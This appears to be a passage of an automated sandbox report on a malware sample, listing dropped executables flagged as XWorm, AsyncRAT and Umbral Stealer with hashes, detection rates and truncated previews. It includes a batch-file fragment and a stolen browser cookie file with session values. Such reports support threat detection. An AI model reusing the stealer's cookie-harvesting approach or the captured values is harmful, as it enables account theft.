                                      SHA-512:556A2CE11D01DE6C940306DA1A1D27BFE95EC52071A0762FD5F27FC5D9D4BE7BD50F9BC7DF922F483F8068783DD29CF81C9A492656DA21285C91404F1D603DDC
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 84%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................<..........^Z... ...`....@.. ....................................@..................................Z..O....`..J....................`....................................................... ............... ..H............text...d:... ...<.................. ..`.rsrc...J....`.......>..............@..@.reloc.......`.......<..............@..B................@Z......H........b..,.......&.....................................................(....*.r...p*. 6V=.*..(....*.rA..p*. ..e.*.s.........s.........s.........s.........*.r...p*. ....*.rA..p*.r...p*. ).,.*.rA..p*. {...*.r...p*. S...*..((...*.r7..p*. ....*.r...p*. ~.H.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.rG..p*. .0..*.r...p*. ....*.rG..p*. ..r.*.r...p*. ....*.r...p*. .B..*.rm..p*. W...*.r...p*. .x

                                      C:\Users\user\AppData\Local\Temp\Nursultan.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Nursultan.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):805888
                                      Entropy (8bit):7.993117417046743
                                      Encrypted:true
                                      SSDEEP:12288:0kj3VyVlq8nK2iRBZM2gBw8o6RFlsn0cM9h6ZismwOixcebpoWldvd:0kj3P22M2gBwnwGE9+i/febDd
                                      MD5:A99954BFF017983BF455DE31C5F0696A
                                      SHA1:6302C232C1DD4DA3B0A013B95F94F7619B354D0A
                                      SHA-256:4C9980B653343C08D0162D2D8A6F6488BD2CA34A5FCD14762670B872315D39C6
                                      SHA-512:9646425AF49B96389D08EAC718A1FCAC51B97035A83E208BE7A667C2036258E134BD0E56187699361B4CB8728E2F6E81532AD33316E95AEE8511E3D0DA0D1F05
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 92%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................0...........N... ...`....@.. ....................................@..................................M..W....`..4............................................................................ ............... ..H............text...4.... ...0.................. ..`.rsrc...4....`.......2..............@..@.reloc...............J..............@..B.................N......H.......@7..............V'................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                      C:\Users\user\AppData\Local\Temp\Nursultan2.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Nursultan.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):606720
                                      Entropy (8bit):7.987793990088752
                                      Encrypted:false
                                      SSDEEP:12288:VXZAg1hx1+pRVDsNScqjhbjtik2wQOV8e1psZk1F5:VpAg1hP+5Ayjtti3Te1qq
                                      MD5:0BA8218F991E81620F31083273EE7D91
                                      SHA1:980539589B8BBA6E619C836436D8C5BA8AEBD18A
                                      SHA-256:738C2F09D5AB56751BD47C492A743208291DC7CE128B7F0EACFCC9EEDF97C786
                                      SHA-512:1277A5B997393B77DE8A4351A14A6B506DEB6268CBABACCBBED7027DA4EEEBE9C0521D4FA21D1FA17F7734E59FEECAD15026CAF4FFE5FBD44690B00F8E8BC7EE
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*.f.................&...........E... ...`....@.. ....................................@..................................D..K....`..4............................................................................ ............... ..H............text...4%... ...&.................. ..`.rsrc...4....`.......(..............@..@.reloc...............@..............@..B.................E......H.......x-..h...........f'................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                      C:\Users\user\AppData\Local\Temp\T0nJclTTP4JN3QI.ligma

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                      Category:dropped
                                      Size (bytes):454652
                                      Entropy (8bit):7.997941427187956
                                      Encrypted:true
                                      SSDEEP:6144:tXYRR5JBVauWIeSWx1Cl/I45RJIyx4qvIEG/0HqN1g1mXJzAwnKOPsgF9g3yX6:yqwgCsyx4qvl1V01s5f
                                      MD5:3E902073F6A62720D2274A868F175548
                                      SHA1:4EA4CAD374474A69407F5C65652BAA26BE039157
                                      SHA-256:7A6F694579C52FE36E6312B3998CA5FDC4F53C6F546736EBCADFD7991076497F
                                      SHA-512:BDD8FC9BA0FA19D3A56ACC9F2B44FFA670147569541DE39F9845969B18914CC790BAEFDE641221712F36B408E56AB6FEB5BFDD57B3C90E2A9A9D93EE1B01F7CF
                                      Malicious:false
                                      Preview:PK..........&Y.*C.....!...#...Browsers\Cookies\Chrome Cookies.txt}.Kr.0...u..(..!.]t.-.4..o`.....2|...w...;.S..o..R.7..........0!...T.S.#]'...q.*R...".b..(..Tg....C...'...[g*C{..}...]N...N]..nR..R;.!]3.H.&)..8..<..U......<.fJ...Q^U?s.q%.%-...4......3...g7..p..>..T....*..{.8JZ..k.e......|m...........PK..........&YO..v.....2......Display\Display.pngl.wT.Q....4.((%. X#( .Ih.D.MQZ@T....$..^..J...J. M.H......-@.....w.w...:.d....o.}.L......y.......6..X./..l..C}..}`p7........^...P..I..w(.+.cw...........8....a.m.Ac..j..........r...~.e..i.^.g.Ij..e...e....k.?.;...e...g..;...eS{.=..(Q+..2.L...8..).L.....NK..n.&<.V..=....?...3;{Y..3.......X..<}.P...S..M.P.bZP.S.<*..;..].ox.\.yr....X.r..D.=|q..g.L...^ig..%Z...mz........<k9....b.^!.....b8.T..`*.I...v.x.j.i..G......).#....R..K...J.....e$P..K.H.9fT....?v...|..d.p.X20T.o.?`b}.".Pk...{....GL.`..\..u}..\..Gw....u.0t..*~.....'..3....<.(~t/.W...1....\(M..%G.R.EI....D..i...kn....xY.l.zGp..bz.&....-G|...N,~$..Z,.k....'...bU;...

                                      C:\Users\user\AppData\Local\Temp\T0nJclTTP4JN3QI\Browsers\Cookies\Chrome Cookies.txt

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):289
                                      Entropy (8bit):5.76524051718901
                                      Encrypted:false
                                      SSDEEP:6:Pk3rcDxbuQ03r4KcsGG1NOpFw+5uQ+Cy8HfyUhEqXfL6vRpAy:c7EEQ074KcW1NOpFwUuQLHaU9WvH9
                                      MD5:B11F445211C21DB45D7B779A5C6E2444
                                      SHA1:27641DD5D8824CD6596FB862681846DAE17A8BBB
                                      SHA-256:11CB0CB1CC5B9BAF4FFB0F950F667FBCC688979D5096DEDCE9883242990955FC
                                      SHA-512:A504B9E59E392209298C2E3113FB06DF75167FD2B36D69BA408BC6BA682D47F015656B06AE270928A7BEF685705E28C20E85786B53DFC308F6952984EA6FC2A0
                                      Malicious:false
                                      Preview:.google.com.TRUE./.FALSE.13343492415760663.1P_JAR.2023-10-04-13...google.com.TRUE./.FALSE.13356711615760707.NID.511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4..

                                      C:\Users\user\AppData\Local\Temp\T0nJclTTP4JN3QI\Display\Display.png

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):471707
                                      Entropy (8bit):7.9215668668207755
                                      Encrypted:false
                                      SSDEEP:12288:bmsZO01Br3OScVq+XOOxBHMGg7aj0OVM6V:Ce1B7OS9y/xBHVgujx
                                      MD5:9C214F98808DC74B8BD74383ACB93C92
                                      SHA1:0754EEEC35F33B75F962D2A27B0DA4ADD7A5AFF5
                                      SHA-256:F3C7F22484E96D6A424484C9D9E531A11B9A98509D08CBC7E4EB2CC84EE6491A
                                      SHA-512:5640182605A63BED2FDA87DAFF68ECFAC704BF78CC2CDDCF06350FC30692877897FC75A8620EDA952DF9C0C39C21B732B882D4161F514B56573E87B456E11F56
                                      Malicious:false
                                      Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....$...VfUu..(=..{.....{.sev.<....Z.f|.....'..A........`....;. .#Ao.............x.......U.=......................|[._.Jr.r.....&.z.T...;\...(.)..H.u.&.bMOzE/..?...>..Vl4..%.tdT..pD....\..'....T.xoH...Z..g. =w.I.yoP..6H.~......w.D...'...M......H.....o.*.~2,...7_.1.o.....Cz.k.H..jK......i..NP=..M.S^.>'..S$'....HO.9...oI5Gz.s....F...X....1.5....1...N.z.%.....L.zD....@.v.|........T......#=..^.~.I..'...=..C..B..'Cm......x$=.X..m..(...ny.>k$.<.*...<.........7..`q.~...A_..#.~..#.....m....m..}.Eh.6{.~.....k.oG..k9.X~+..u.m...m!.{k..........f1.....}..c,...:1.n#..Y..........k.K.z.y.Cm..P...._.mc.6G.....1.....l]k.\.96...;cSH.o.uu...Y.#...!....}h..eue...W..9R.m.5.\jb...{m.._..1..+V.a.O.5.......0...l.P;.^.....>9...T{6D.y..n[......kc...^.A,...9..hC...um.Z.n.9]6.i.V..ayS..T....)O.g....c...|>...!..:.U&..1..z\.1]Ok./..c,F.F...?..&.j.b,...u.....T{.....

                                      C:\Users\user\AppData\Local\Temp\Umbral.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Nursultan2.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):236544
                                      Entropy (8bit):6.080049516389128
                                      Encrypted:false
                                      SSDEEP:6144:xloZM+rIkd8g+EtXHkv/iD4YD+rmkrHMs9YW3X2TFb8e1m9H4i:DoZtL+EP8YD+rmkrHMs9YW3X25IHB
                                      MD5:DF69E1468A4656F2EEC526DE59A89A8B
                                      SHA1:E65E192BE57CD672B8EF19CD72AD89CBD3F8F60A
                                      SHA-256:4D3A9636E9D29F227B56D7BF140154384E1F426B69CF213AE46115E8D966AA92
                                      SHA-512:409DCA3F4CE130034B3004726939A59F38939D46E09F04D6C8A77EA20E3FF931D1A7332F00C06C3E46D8C64796AC93299C2F5A6595777F3E05CF89BC0522449F
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 92%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`....................................K.......P............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B........................H.......@...t.......6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2kmjfn3k.xvy.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b5clhoru.5k2.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccx3dsac.jkz.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkh32k1q.b00.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_glyhx1q4.4jt.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcxerpxf.bzj.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u5wqjmdk.hqr.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wkq4s1x5.u1h.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\nursultan.bat

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Nursultan2.exe
                                      File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (3953), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):9376
                                      Entropy (8bit):5.740026667303915
                                      Encrypted:false
                                      SSDEEP:96:VpoiWTxQ9t6rK5jHzhqfmA6WoU34PuktJ5utaM/5HTFNnGFkiZ6NUbfFQJswi54k:YTxQ92cVABQMQzPOWBjneY
                                      MD5:A4E674B923499465DD85B96B18EBCF3D
                                      SHA1:65838CCFC2B3A0B4928CFEF85C50FF33E54DF1CF
                                      SHA-256:433662D2A7E13057D8575252B953ABBAFBD9B932BF778C989124D5DB2C1EBCF9
                                      SHA-512:591E2F147A44419558E12BC140E19F7FE68B4B588B44986D3FE46C5141CA1FCE9F6FC78E43F136912B79368AA0BD33279B326EF81473EE373E38DED73D80F710
                                      Malicious:false
                                      Preview:@echo off..for /F %%a in ('ECHO prompt $E ^| cmd') do (.. SET "ESC=%%a"..)..chcp 65001..cls..SETLOCAL enabledelayedexpansion..>nul timeout 4 /nobreak..goto :main......:: .......... ..... ... ..... ........:passwd..for /f "skip=1 delims= eol=" %%c in ('"echo(|replace foo . /u /w"') do set "CR=%%c"..for /f %%c in ('"prompt $H & for %%_ in (_) do rem"') do set "BS=%%c"..echo(|set /p ="!ESC![0m ......: "..set result=..:run..set c=..for /f "skip=1 delims= eol=" %%c in ('"replace foo . /u /w"') do set "c=%%c"..if "%c%"=="%bs%" goto backspace..if "%c%"=="%cr%" goto enter..goto char..:backspace.. if "%result%"=="" goto run.. set result=%result:~0,-1%.. echo|set /p =%bs% %bs%.. goto run..:char.. set result=%result%%c%.. echo |set /p =*.. goto run..:enter.. goto check....:check..echo(..echo(..echo(..>nul timeout 4 /nobreak..if "%login%" == "" goto checkfailed..if "%result%" == "" goto checkfailed..goto checkaccess........:: ......... ...

                                      C:\Users\user\AppData\Local\Temp\tmp2855.tmp.dat

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                      Category:dropped
                                      Size (bytes):106496
                                      Entropy (8bit):1.136413900497188
                                      Encrypted:false
                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                      MD5:429F49156428FD53EB06FC82088FD324
                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\tmp2875.tmp.dat

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                      Category:dropped
                                      Size (bytes):40960
                                      Entropy (8bit):0.8553638852307782
                                      Encrypted:false
                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\tmp2876.tmp.dat

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                      Category:dropped
                                      Size (bytes):106496
                                      Entropy (8bit):1.136413900497188
                                      Encrypted:false
                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                      MD5:429F49156428FD53EB06FC82088FD324
                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\tmp2887.tmp.tmpdb

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                      Category:dropped
                                      Size (bytes):5242880
                                      Entropy (8bit):0.03859996294213402
                                      Encrypted:false
                                      SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                      MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                      SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                      SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                      SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                      Malicious:false
                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\tmp28E5.tmp.dat

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                      Category:dropped
                                      Size (bytes):196608
                                      Entropy (8bit):1.121297215059106
                                      Encrypted:false
                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                      Malicious:false
                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\tmp2915.tmp.dat

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                      Category:dropped
                                      Size (bytes):196608
                                      Entropy (8bit):1.121297215059106
                                      Encrypted:false
                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
